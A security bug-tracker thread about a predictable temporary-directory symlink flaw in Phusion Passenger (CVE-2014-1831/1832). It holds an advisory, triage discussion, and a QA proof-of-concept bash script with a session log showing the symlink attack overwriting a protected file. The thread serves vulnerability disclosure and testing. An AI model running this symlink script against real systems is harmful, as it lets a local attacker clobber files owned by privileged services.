Bugzilla – Bug 860994
VUL-1: rubygem-passenger: temporary file issue
Last modified: 2016-05-19 15:30:09 UTC
Via OSS-sec: Can a CVE be assigned to the following issue? Phusion Passenger creates a "server instance directory" in /tmp during startup, which is a temporary directory that Phusion Passenger uses to store working files. This directory is deleted after Phusion Passenger exits. For various technical reasons, this directory must have a semi-predictable filename. If a local attacker can predict this filename, and precreates a symlink with the same filename that points to an arbitrary directory with mode 755, owner root and group root, then the attacker will succeed in making Phusion Passenger write files and create subdirectories inside that target directory. The following files/subdirectories are created: * control_process.pid * generation-X, where X is a number. If you happen to have a file inside the target directory called `control_process.pid`, then that file's contents are overwritten. These files and directories are deleted during Phusion Passenger exit. The target directory itself is not deleted, nor are any other contents inside the target directory, although the symlink is. It is fixed in upstream version 4.0.33. References: https://github.com/phusion/passenger/commit/34b1087870c2 http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=736958 https://bugzilla.redhat.com/show_bug.cgi?id=1058992 -- Vincent Danen / Red Hat Security Response Team
looks like duplicate of https://bugzilla.novell.com/show_bug.cgi?id=695994 I think that conclusion is still same, not?
hehe, indeed. the question is why its not fixed upstream or Factory
(In reply to comment #2) > hehe, indeed. the question is why its not fixed upstream or Factory because we do not fix it. It is evaluated as not so critical and we had more urgent problems.
In case we decide to fix it, we should also include https://github.com/phusion/passenger/commit/94428057c602da3d6d34ef75c78091066ecac5c0
We can take the fix from upstream. Its not needed to update for existing products, its just that it could have been fixed along with other passenger updates that we already did meanwhile. So Factory is enough (and to accumulate it with other fixes for the next passenger update).
bugbot adjusting priority
CVE-2014-1831 and CVE-2014-1832
proof of concept for QA: vagrant@vagrant-kvm-sles11-sp3:~> cat nginx.sh #!/bin/bash HL=`cat /proc/sys/kernel/pid_max` #passenger.1.0.4885 #vagrant-kvm-sles11-sp3:/tmp # ls -l /etc/very-important-stuffs/ for a in $(seq 1000 $HL); do mkdir "/tmp/passenger.1.0.$a" ln -s /etc/very-important-stuffs/the-secret-of-universe.txt "/tmp/passenger.1.0.$a/control_process.pid" done vagrant@vagrant-kvm-sles11-sp3:~> vagrant@vagrant-kvm-sles11-sp3:~> cat /etc/very-important-stuffs/the-secret-of-universe.txt 42 vagrant@vagrant-kvm-sles11-sp3:~> ls -l /etc/very-important-stuffs/ total 4 -rw-r--r-- 1 nginx root 3 Mar 2 17:55 the-secret-of-universe.txt vagrant@vagrant-kvm-sles11-sp3:~> echo 31337 > /etc/very-important-stuffs/the-secret-of-universe.txt -bash: /etc/very-important-stuffs/the-secret-of-universe.txt: Permission denied vagrant@vagrant-kvm-sles11-sp3:~> ./nginx.sh vagrant@vagrant-kvm-sles11-sp3:~> sudo /etc/init.d/nginx start Starting nginx done vagrant@vagrant-kvm-sles11-sp3:~> cat /etc/very-important-stuffs/the-secret-of-universe.txt 9621vagrant@vagrant-kvm-sles11-sp3:~> vagrant@vagrant-kvm-sles11-sp3:~>
OK, it is fixed in recent opensuse and also for SLE12 as it uses newer packages. For old product I am do not know about any of it affected by this issue. So lets close it.